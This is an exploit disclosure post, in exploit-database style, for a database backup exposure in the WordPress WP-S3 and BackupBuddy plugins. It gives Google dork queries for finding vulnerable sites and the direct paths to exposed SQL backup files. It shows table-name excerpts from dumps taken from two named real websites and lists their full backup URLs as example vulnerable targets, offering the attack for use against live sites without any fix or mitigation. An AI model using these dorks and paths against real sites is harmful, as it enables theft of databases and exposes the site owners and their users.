WordPress Ithemes-BackupBuddy Amazon WP-S3 2.9 Database Disclosure

`#################################################################################################  
  
# Exploit Title : WordPress Ithemes-BackupBuddy Amazon WP-S3 Plugins 2.9  
Database Backup Disclosure  
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security  
Army  
# Date : 17/12/2018  
# Vendor Homepage : ithemes.com/purchase/backupbuddy/ ~  
wordpress.org/plugins/wp-s3/  
# Software Download Link : downloads.wordpress.org/plugin/wp-s3.1.5.zip  
# Tested On : Windows and Linux  
# Category : WebApps  
# Version Information : WP-S3 1.5 Version - Ithemes-BackupBuddy 2.9 Version  
# Exploit Risk : Medium  
# Google Dorks : inurl:''/wp-content/uploads/wp-s3-database-backup.sql''  
+ intext:''Powered by Shopify''  
+ intext:A(c) 2018, Holy Sparks Jewish Art & Books For Spiritual & Personal  
Development Powered by Shopify''  
+ intext:''2015 A(c) ALL RIGHTS RESERVED BY THE-SCHMIDT''  
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access  
Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]  
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]  
  
#################################################################################################  
  
WordPress Amazon S3 Plugin 1.5 and WordPress Ithemes-BackupBuddy 2.9  
  
#################################################################################################  
  
# Admin Panel Login Path :  
  
/wp-login.php  
  
# Exploit :  
  
/wp-content/uploads/wp-s3-database-backup.sql  
  
/wp-content/uploads/wp-s3-backups.zip  
  
#################################################################################################  
  
# Example SQL Dump Some Informations and Tables Names => holysparks.org  
  
-- MySQL dump 10.13 Distrib 5.1.58, for unknown-linux-gnu (x86_64)  
--  
-- Host: localhost Database: raeshaga_wrd1  
-- ------------------------------------------------------  
-- Server version 5.1.58-community-log  
  
-- Table structure for table `wp_StreamPad_Tracks`  
  
-- Dumping data for table `wp_StreamPad_Tracks`  
  
-- Table structure for table `wp_affiliates_banners_tbl`  
  
-- Dumping data for table `wp_affiliates_banners_tbl`  
  
-- Table structure for table `wp_affiliates_clickthroughs_tbl`  
  
-- Dumping data for table `wp_affiliates_clickthroughs_tbl`  
  
-- Table structure for table `wp_affiliates_leads_tbl`  
  
-- Dumping data for table `wp_affiliates_leads_tbl`  
  
-- Table structure for table `wp_affiliates_payouts_tbl`  
  
-- Dumping data for table `wp_affiliates_payouts_tbl`  
  
-- Table structure for table `wp_affiliates_sales_tbl`  
  
-- Dumping data for table `wp_affiliates_sales_tbl`  
  
-- Table structure for table `wp_affiliates_tbl`  
  
-- Dumping data for table `wp_affiliates_tbl`  
  
-- Table structure for table `wp_commentmeta`  
  
-- Dumping data for table `wp_commentmeta`  
  
-- Table structure for table `wp_comments`  
  
-- Dumping data for table `wp_comments`  
  
-- Table structure for table `wp_contact_form_7`  
  
-- Dumping data for table `wp_contact_form_7`  
  
-- Table structure for table `wp_ft_wpecards`  
  
-- Dumping data for table `wp_ft_wpecards`  
  
-- Table structure for table `wp_links`  
  
-- Dumping data for table `wp_links`  
  
-- Table structure for table `wp_options`  
  
-- Dumping data for table `wp_options`  
  
-- Dump completed....  
  
################################################################################################  
  
# Example SQL Dump Informations and Tables Names => the-schmidt.com  
  
-- MySQL dump 10.13 Distrib 5.1.60, for unknown-linux-gnu (x86_64)  
--  
-- Host: localhost Database: theschm1_blog  
-- ------------------------------------------------------  
-- Server version 5.1.60-community-log  
  
-- Table structure for table `wp_PluginManager`  
  
-- Dumping data for table `wp_PluginManager`  
  
-- Table structure for table `wp_custom_fonts`  
  
-- Dumping data for table `wp_custom_fonts`  
  
-- Table structure for table `wp_cvg_gallery`  
  
-- Dumping data for table `wp_cvg_gallery`  
  
-- Table structure for table `wp_cvg_videos`  
  
-- Dumping data for table `wp_cvg_videos`  
  
-- Table structure for table `wp_download_status`  
  
-- Dumping data for table `wp_download_status`  
  
-- Table structure for table `wp_fancybox`  
  
-- Dumping data for table `wp_fancybox`  
  
-- Table structure for table `wp_item_category_associations`  
  
-- Dumping data for table `wp_item_category_associations`  
  
-- Table structure for table `wp_links`  
  
-- Dumping data for table `wp_links`  
  
-- Table structure for table `wp_ngg_album`  
  
-- Dumping data for table `wp_ngg_album`  
  
-- Table structure for table `wp_ngg_gallery`  
  
-- Dumping data for table `wp_ngg_gallery`  
  
-- Table structure for table `wp_ngg_pictures`  
  
-- Dumping data for table `wp_ngg_pictures`  
  
-- Table structure for table `wp_also_bought_product`  
  
-- Dumping data for table `wp_also_bought_product`  
  
-- Table structure for table `wp_blc_filters`  
  
-- Dumping data for table `wp_blc_filters`  
  
-- Table structure for table `wp_blc_instances`  
  
-- Dumping data for table `wp_blc_instances`  
  
-- Table structure for table `wp_blc_links`  
  
-- Dumping data for table `wp_blc_links`  
  
-- Table structure for table `wp_options`  
  
-- Dumping data for table `wp_options`  
  
-- Dump completed...  
  
#################################################################################################  
  
# Example Vulnerable Sites =>  
  
[+] holysparks.org/wp-content/uploads/wp-s3-database-backup.sql  
  
[+] the-schmidt.com/blog/wp-content/uploads/wp-s3-database-backup.sql  
  
#################################################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team  
  
#################################################################################################  
`